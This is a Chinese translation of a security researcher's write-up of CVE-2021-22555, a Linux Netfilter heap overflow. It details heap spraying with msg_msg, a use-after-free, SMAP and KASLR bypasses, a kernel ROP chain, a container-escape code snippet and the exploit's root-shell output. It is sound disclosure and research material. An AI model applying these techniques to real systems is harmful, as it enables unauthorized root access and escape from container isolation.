CVE-2021-22555: 从 x00x00 到10000$奖金 - FreeBuf网络安全行业门户

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户，每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序把安全装进口袋

漏洞

^{0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9
0
1
2
3
4
5
6
7
8
9}

CVE-2021-22555: 从 x00x00 到10000$奖金

FreeBuf_307936 2021-07-16 19:33:23 309566

CVE-2021-22555是一个在Linux的Netfilter中有着15年历史的堆越界写漏洞，足以绕过所有现代安全缓解措施，实现内核代码执行。它被用来破坏了kCTF集群的kubernetes pod隔离并为慈善机构赢得了一万美金（谷歌将会把捐赠金额翻倍到两万美金）。

介绍

在BleedingTooth之后，这是我第一次研究Linux，我同样想找到一个提权的漏洞。我首先查看了CVE-2016-3134和CVE-2016-4997等老漏洞，这启发了我在Netfilter代码中查找memcpy()和memset()。这让我找到了一些有漏洞的代码。

漏洞点

当IPT_SO_SET_REPLaCE或IP6T_SO_SET_REPLaCE在兼容模式下被调用时（需要CAP_NET_ADMIN），结构需要从用户到内核以及32位到64位进行转换，以便被原生函数处理。自然，这注定是容易出错的。我们的漏洞在xt_compat_target_from_user()中，其中memset()被使用偏移量target->targetsize调用，该偏移量在分配过程中没有被考虑进去，从而导致一些字节的越界写入。

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c
void xt_compat_target_from_user(struct xt_entry_target *t, void **dstptr,
                unsigned int *size)
{
    const struct xt_target *target = t->u.kernel.target;
    struct compat_xt_entry_target *ct = (struct compat_xt_entry_target *)t;
    int pad, off = xt_compat_target_offset(target);
    u_int16_t tsize = ct->u.user.target_size;
    char name[sizeof(t->u.user.name)];

    t = *dstptr;
    memcpy(t, ct, sizeof(*ct));
    if (target->compat_from_user)
        target->compat_from_user(t->data, ct->data);
    else
        memcpy(t->data, ct->data, tsize - sizeof(*ct));
    pad = XT_ALIGN(target->targetsize) - target->targetsize;
    if (pad > 0)
        memset(t->data + target->targetsize, 0, pad);

    tsize += off;
    t->u.user.target_size = tsize;
    strlcpy(name, target->name, sizeof(name));
    module_put(target->me);
    strncpy(t->u.user.name, name, sizeof(t->u.user.name));

    *size += off;
    *dstptr += tsize;
}

targetsize不受用户的控制，但可以通过名称选择不同结构大小的目标（如TCPMSS、TTL或NFQUEUE）。targetsize越大，在偏移量上可变化的地方就越多。目标的大小必须不是8字节对齐的，这样才能满足pad > 0的条件。我发现的可能性最大的结构是NFLOG，通过该结构我们可以指定一个越界大小多达0x4c个字节的偏移量（可以通过在struct xt_entry_match和struct xt_entry_target之间添加填充来影响偏移量）。

struct xt_nflog_info {
    /* 'len' will be used iff you set XT_NFLOG_F_COPY_LEN in flags */
    __u32   len;
    __u16   group;
    __u16   threshold;
    __u16   flags;
    __u16   pad;
    char        prefix[64];
};

注意缓冲区的目标是用GFP_KERNEL_ACCOUNT分配的，其大小也可以变化：

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/net/netfilter/x_tables.c
struct xt_table_info *xt_alloc_table_info(unsigned int size)
{
    struct xt_table_info *info = NULL;
    size_t sz = sizeof(*info) + size;

    if (sz < sizeof(*info) || sz >= XT_MAX_TABLE_SIZE)
        return NULL;

    info = kvmalloc(sz, GFP_KERNEL_ACCOUNT);
    if (!info)
        return NULL;

    memset(info, 0, sizeof(*info));
    info->size = size;
    return info;
}

虽然最小的尺寸大于0x100，这意味着这个对象可以分配的最小板块是kmalloc-512。换句话说，我们必须找到在kmalloc-512和kmalloc-8192之间分配的受害者来加以利用。

利用

我们的原语限于写四个零字节到0x4C个字节的越界。有了这样一个原语，通常的目标是:

引用计数
不幸的是，我找不到任何合适的在前0x4c个字节有引用计数的对象
free list指针
CVE-2016-6187: Exploiting Linux kernel heap off-by-one是一个很好的关于如何利用free list指针的例子，然而这已经是五年前的技术了，与此同时内核启用了CONFIG_SLAB_FREELIST_HARDENED选项，其中包括对free list指针的保护。
结构体内部指针
这是最有希望的方法，然而四个零字节太多了而无法写入。例如，一个指针0xff91a49cb7f000只能变成0xff91a400000000或0x9cb7f000，其中这两个都可能是无效的指针。另一方面，如果我们使用原语在相邻块的最开始写，我们可以写更少的字节，例如2个字节，例如将一个指针从0xff91a49cb7f000转到0xff91a49cb70000。

在研究一些受害者对象时，我注意到在内核5.4版本下，我永远无法可靠地在struct xt_table_info周围分配它们。我意识到这与GFP_KERNEL_ACCOUNT标志有关，因为其他用GFP_KERNEL_ACCOUNT分配的对象并没有这个问题。Jann Horn证实，在5.9之前，不同的slab被用来实现计数。因此我们的利用链中的每一条堆原语也应该使用GFP_KERNEL_ACCOUNT。

系统调用msgsnd()是一个众所周知的堆喷的原语（它使用GFP_KERNEL_ACCOUNT），并且已经被用于多个公开的漏洞中。然而，它的结构体msg_msg却令人惊讶地从未被滥用过。在这篇文章中，我们将展示这个数据结构是如何被滥用来获得一个UAF原语，而这个原语又可以被用来泄露地址和伪造其他对象。巧合的是，与我2021年3月的研究同时进行的是，Alexander Popov也在Four Bytes of Power: exploiting CVE-2021-26708 in the Linux kernel中探索了同样的结构。

探究struct msg_msg

当使用msgsnd()发送数据时，payload被分割成多个段：

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
static struct msg_msg *alloc_msg(size_t len)
{
    struct msg_msg *msg;
    struct msg_msgseg **pseg;
    size_t alen;

    alen = min(len, DATALEN_MSG);
    msg = kmalloc(sizeof(*msg) + alen, GFP_KERNEL_ACCOUNT);
    if (msg == NULL)
        return NULL;

    msg->next = NULL;
    msg->security = NULL;

    len -= alen;
    pseg = &msg->next;
    while (len > 0) {
        struct msg_msgseg *seg;

        cond_resched();

        alen = min(len, DATALEN_SEG);
        seg = kmalloc(sizeof(*seg) + alen, GFP_KERNEL_ACCOUNT);
        if (seg == NULL)
            goto out_err;
        *pseg = seg;
        seg->next = NULL;
        pseg = &seg->next;
        len -= alen;
    }

    return msg;

out_err:
    free_msg(msg);
    return NULL;
}

其中struct msg_msg和struct msg_msgseg的头文件为：

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/msg.h
/* one msg_msg structure for each message */
struct msg_msg {
    struct list_head m_list;
    long m_type;
    size_t m_ts;        /* message text size */
    struct msg_msgseg *next;
    void *security;
    /* the actual message follows immediately */
};

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/types.h
struct list_head {
    struct list_head *next, *prev;
};

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msgseg {
    struct msg_msgseg *next;
    /* the next part of the message follows immediately */
};

struct msg_msg中的第一个成员是mlist.next指针，它指向队列中的另一条消息（这与next不同，因为它是指向下一个段的指针）。这是一个完美的用于引起错误的选择，下面将会提到。

达成UAF

首先，我们用msgget()初始化大量的消息队列（在我们的例子中是4096）。然后，我们用msgnd()为每个消息队列发送一条大小为4096的消息（包括结构msg_msg头），我们将其称为一级消息。最终，在大量的消息之后，我们有一些是连续的:

图1 一系列一级消息块

接下来，我们使用msgsnd()为每个消息队列发送大小为1024的二级消息：

图2 一系列指向二级消息的一级消息块

最后，我们在一级消息中创建一些洞（在我们的例子中是第1024的倍数个），并触发存在漏洞的setockopt(IPT_SO_SET_REPLaCE)选项，在最好的情况下，它将在其中一个洞中分配struct xt_table_info对象：

图3 一个在block中分配，破坏next指针的xt_table_info结构

我们选择用零来覆盖相邻对象的两个字节。假设我们与另一个一级消息相邻，我们覆盖的这些字节是指向二级消息的指针的一部分。由于我们分配给它们的大小为1024字节，因此我们有$1-(1024 / 65536)$的机会重定向指针（唯一失败的情况是当指针的两个最不重要的字节已经为零时）。

现在，我们能希望的最好情况是，被操纵的指针也指向一个二级消息，结果将是两个不同的一级消息指向同一个二级消息，从而导致UAF：

图4 由于损坏指针导致两个一级消息指向同一个二级消息

然而，我们将如何得知哪两个一级消息指向了同一个二级消息？为了回答这个问题，我们使用消息队列的索引标记每一个一级/二级消息，索引的范围在$[0, 4096)$之间。然后，在触发了错误之后，我们遍历全部的消息队列，用MSG_COPY调用msgrcv()来探视所有的消息，观察是否相同。如果一级消息的标记与二级消息的索引不同，则说明其已被重定向。在这种情况下，一级消息的标记代表假消息队列的索引，即包含错误的二级消息的队列。而错误的二级消息的标签代表真实消息队列的索引。知道了这两个索引，实现UAF就很简单了——我们可以使用msgrcv()从真正消息队列中获取二级消息，并以此来释放它。

图5 使用旧引用释放了的二级消息

注意我们在伪造消息队列中仍然拥有一个指向被释放消息的引用。

SMAP绕过

使用unix套接字（可以用socketpair()轻松设置），我们现在喷射大量大小为1024的消息，并模仿struct msg_msg头。理想情况下，我们能够收回之前释放的消息的地址:

图6 伪造的struct msg_msg被写入到释放了的二级消息处

注意mlist.next是41414141，因为我们还不知道任何内核地址（当SMAP被启用时，我们不能指定一个用户地址）。没有内核地址是至关重要的，因为它实际上阻止了我们再次释放该块（你将在后面了解为什么要这样做）。原因是在msgrcv()过程中，消息被从循环列表的消息队列中解除链接。幸运的是，我们实际上处于一个实现信息泄露的好位置，因为在struct msg_msg中有一些有趣的字段。字段m_ts是用来决定返回多少数据给用户区的。

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/ipc/msgutil.c
struct msg_msg *copy_msg(struct msg_msg *src, struct msg_msg *dst)
{
    struct msg_msgseg *dst_pseg, *src_pseg;
    size_t len = src->m_ts;
    size_t alen;

    if (src->m_ts > dst->m_ts)
        return ERR_PTR(-EINVAL);

    alen = min(len, DATALEN_MSG);
    memcpy(dst + 1, src + 1, alen);

    ...
    return dst;
}

消息的原始大小只有1024-sizeof(struct msg_msg)字节，我们现在可以人为地增加到DATALEN_MSG=4096-sizeof(struct msg_msg)。因此，我们现在可以读取超过预期的消息大小，并泄漏相邻消息的struct msg_msg头。如前所述，消息队列被实现为一个循环列表，因此，mlist.next指向一级消息。

知道了一级信息的地址，我们可以重新伪造struct msg_msg，将该地址作为next（意味着它是下一个段）。然后可以通过读取超过DATALEN_MSG字节来泄露一级信息的内容。从一级信息中泄露的mlist.next指针显示了与我们的伪造struct msg_msg相邻的二级信息的地址。从该地址减去1024，我们终于得到了假消息的地址。

实现更好的UAF

现在，我们可以用泄漏的地址重建伪造的struct msg_msg对象，作为mlist.next和mlist.prev（意味着它是指向自己的），使假消息可以与假消息队列自由流通。

图7 带有有效next指针且指向自身的假struct msg_msg

注意，当使用unix套接字进行喷射时，我们实际上有一个指向假消息的struct sk_buff对象。很明显，这意味着当我们释放假消息时，我们仍然有一个旧引用：

图8 带有旧引用的释放的伪造信息

旧的struct sk_buff数据缓冲区是一个更好的UAF场景，因为它不包含头信息，意味着我们现在可以用它来释放slab上的任何种类的对象。相比之下，释放struct msg_msg对象只有在前两个成员是可写指针的情况下才有可能（需要unlink该消息）。

寻找受害者

最好的攻击对象是在其结构中拥有一个函数指针的对象。记住，受害者必须也用GFP_KERNEL_ACCOUNT分配。

与Jann Horn交谈时，他建议使用struct pipe_buffer对象，该对象在kmalloc-1024中分配（因此二级信息是1024字节）。struct pipe_buffer可以很容易地用pipe()来分配，它的子程序是alloc_pipe_info()：

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
struct pipe_inode_info *alloc_pipe_info(void)
{
    ...
    unsigned long pipe_bufs = PIPE_DEF_BUFFERS;
    ...
    pipe = kzalloc(sizeof(struct pipe_inode_info), GFP_KERNEL_ACCOUNT);
    if (pipe == NULL)
        goto out_free_uid;
    ...
    pipe->bufs = kcalloc(pipe_bufs, sizeof(struct pipe_buffer),
                 GFP_KERNEL_ACCOUNT);
    ...
}

虽然它没有直接包含一个函数指针，但它包含一个指向struct pipe_buf_operations的指针，而这个结构有函数指针：

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/include/linux/pipe_fs_i.h
struct pipe_buffer {
    struct page *page;
    unsigned int offset, len;
    const struct pipe_buf_operations *ops;
    unsigned int flags;
    unsigned long private;
};

struct pipe_buf_operations {
    ...
    /*
     * When the contents of this pipe buffer has been completely
     * consumed by a reader, ->release() is called.
     */
    void (*release)(struct pipe_inode_info *, struct pipe_buffer *);
    ...
};

绕过KASLR/SMEP

在向管道写入时，struct pipe_buffer被填充。最重要的是，ops将指向驻扎在.data段的静态结构anon_pipe_buf_ops：

// https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/fs/pipe.c
static const struct pipe_buf_operations anon_pipe_buf_ops = {
    .release    = anon_pipe_buf_release,
    .try_steal  = anon_pipe_buf_try_steal,
    .get        = generic_pipe_buf_get,
};

由于.data段和.text段之间的差异总是相同的，拥有anon_pipe_buf_ops基本上可以让我们计算出内核的基址。

我们喷射了大量的struct pipe_buffer对象，并回收旧struct sk_buff数据缓冲区的位置：

图9 释放的伪造信息通过一个struct pipe_buffer回收

由于我们仍然有一个来自struct sk_buff的引用，我们可以读取它的数据缓冲区，泄露struct pipe_buffer的内容，并显示anon_pipe_buf_ops的地址：

[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

有了这些信息，我们现在可以找到JOP/ROP的gadgets。注意，当从unix套接字中读取时，我们实际上也释放了它的缓冲区：

图10 释放的伪造信息通过一个struct pipe_buffer回收

权限提升

我们用一个伪造的struct pipe_buffer来回收旧的结构，其ops指向一个假的struct pipe_buf_operations。这个假结构体被放置在同一位置，因为我们知道它的地址。显然，这个结构应该包含一个恶意的函数指针作为release：

图11 释放的struct pipe_buffer通过一个伪造的struct pipe_buffer回收

该漏洞的最后阶段是关闭所有管道，以便触发release，这反过来又会启动JOP链。找到JOP gadgets是很难的，因此，目标是尽快实现内核栈迁移，以便执行内核ROP链。

内核ROP链

我们把RBP的值保存在内核的某个scratchpad地址上，以便以后可以继续执行，然后我们调用commit_creds(prepare_kernel_cred(NULL))来安装内核证书，最后我们调用switch_task_namespaces(find_task_by_vpid(1), init_nsproxy)来把进程1的命名空间切换到init进程的命名空间。之后，我们恢复RBP的值并返回以恢复执行（这将立即使free_pipe_info()返回）。

容器逃逸并反弹root shell

回到用户区后，我们现在有了root权限，可以改变mnt、pid和net命名空间，从而逃逸，脱离kubernetes pod。最终，我们弹出了一个root shell。

setns(open("/proc/1/ns/mnt", O_RDONLY), 0);
setns(open("/proc/1/ns/pid", O_RDONLY), 0);
setns(open("/proc/1/ns/net", O_RDONLY), 0);

char *args[] = {"/bin/bash", "-i", NULL};
execve(args[0], args, NULL);

PoC

PoC已被上传至https://github.com/google/security-research/tree/master/pocs/linux/cve-2021-22555

在存在漏洞的机器上运行将会提权至root：

theflow@theflow:~$ gcc -m32 -static -o exploit exploit.c
theflow@theflow:~$ ./exploit
[+] Linux Privilege Escalation by theflow@ - 2021

[+] STAGE 0: Initialization
[*] Setting up namespace sandbox...
[*] Initializing sockets and message queues...

[+] STAGE 1: Memory corruption
[*] Spraying primary messages...
[*] Spraying secondary messages...
[*] Creating holes in primary messages...
[*] Triggering out-of-bounds write...
[*] Searching for corrupted primary message...
[+] fake_idx: ffc
[+] real_idx: fc4

[+] STAGE 2: SMAP bypass
[*] Freeing real secondary message...
[*] Spraying fake secondary messages...
[*] Leaking adjacent secondary message...
[+] kheap_addr: ffff91a49cb7f000
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Leaking primary message...
[+] kheap_addr: ffff91a49c7a0000

[+] STAGE 3: KASLR bypass
[*] Freeing fake secondary messages...
[*] Spraying fake secondary messages...
[*] Freeing sk_buff data buffer...
[*] Spraying pipe_buffer objects...
[*] Leaking and freeing pipe_buffer object...
[+] anon_pipe_buf_ops: ffffffffa1e78380
[+] kbase_addr: ffffffffa0e00000

[+] STAGE 4: Kernel code execution
[*] Spraying fake pipe_buffer objects...
[*] Releasing pipe_buffer objects...
[*] Checking for root...
[+] Root privileges gained.

[+] STAGE 5: Post-exploitation
[*] Escaping container...
[*] Cleaning up...
[*] Popping root shell...
root@theflow:/# id
uid=0(root) gid=0(root) groups=0(root)
root@theflow:/#

时间线

2021-04-06 - 向security@kernel.org报告漏洞。
2021-04-13 - 补丁合并到上游。
2021-07-07 - 公开漏洞信息。

致谢

Eduardo Vela
Francis Perron
Jann Horn

原文作者：Andy Nguyen (theflow@)
原文地址：https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html

# 漏洞分析

本文为 FreeBuf_307936 独立观点，未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件，请联系 FreeBuf 客服小蜜蜂（微信：freebee1024）

被以下专辑收录，发现更多精彩内容

+ 收入我的专辑

+ 加入我的收藏

展开更多